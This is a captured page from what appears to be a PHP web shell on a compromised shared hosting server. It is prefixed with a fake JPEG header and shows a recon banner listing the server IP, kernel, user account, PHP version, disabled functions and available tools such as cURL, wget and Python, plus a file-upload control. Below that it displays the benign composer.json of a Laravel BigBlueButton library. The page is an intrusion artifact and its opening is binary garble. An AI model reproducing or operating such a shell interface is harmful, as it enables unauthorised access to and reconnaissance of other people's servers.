����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.218.251.50 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/bofirm.gltechlimited.com/vendor/joisarjignesh/bigbluebutton/ |
Upload File : |
{ "name": "joisarjignesh/bigbluebutton", "description": "BigBlueButton Server API Library for Laravel", "keywords": [ "joisarjignesh", "bigbluebutton", "api", "bbb", "meeting", "package", "laravel-package", "laravel", "php" ], "homepage": "https://github.com/joisarjignesh/bigbluebutton", "license": "MIT", "version": "v2.6", "type": "library", "authors": [ { "name": "Jignesh Joisar", "email": "jigneshjoisar@gmail.com", "homepage": "https://jigneshjoisar.web.app", "role": "Developer" } ], "require": { "php": "^7.4|^8.0|^8.1|^8.2", "illuminate/support": "^5.5|^6.0|^7.0|^8.0|^9.0|^10.0", "littleredbutton/bigbluebutton-api-php": "~5.0" }, "require-dev": { "orchestra/testbench": "^4.0|^7.0|^8.0", "phpunit/phpunit": "^8.0|^9.0" }, "autoload": { "psr-4": { "JoisarJignesh\\Bigbluebutton\\": "src/" }, "files": [ "src/helpers.php" ] }, "autoload-dev": { "psr-4": { "JoisarJignesh\\Bigbluebutton\\Tests\\": "tests/" } }, "scripts": { "test": "vendor/bin/phpunit", "test-coverage": "vendor/bin/phpunit --coverage-html coverage" }, "config": { "sort-packages": true }, "minimum-stability": "dev", "prefer-stable": true, "support": { "source": "https://github.com/joisarjignesh/bigbluebutton", "issues": "https://github.com/joisarjignesh/bigbluebutton/issues", "docs": "https://github.com/joisarjignesh/bigbluebutton/blob/master/README.md" }, "extra": { "laravel": { "providers": [ "JoisarJignesh\\Bigbluebutton\\BigbluebuttonServiceProvider" ], "aliases": { "Bigbluebutton": "JoisarJignesh\\Bigbluebutton\\Facades\\Bigbluebutton" } } } }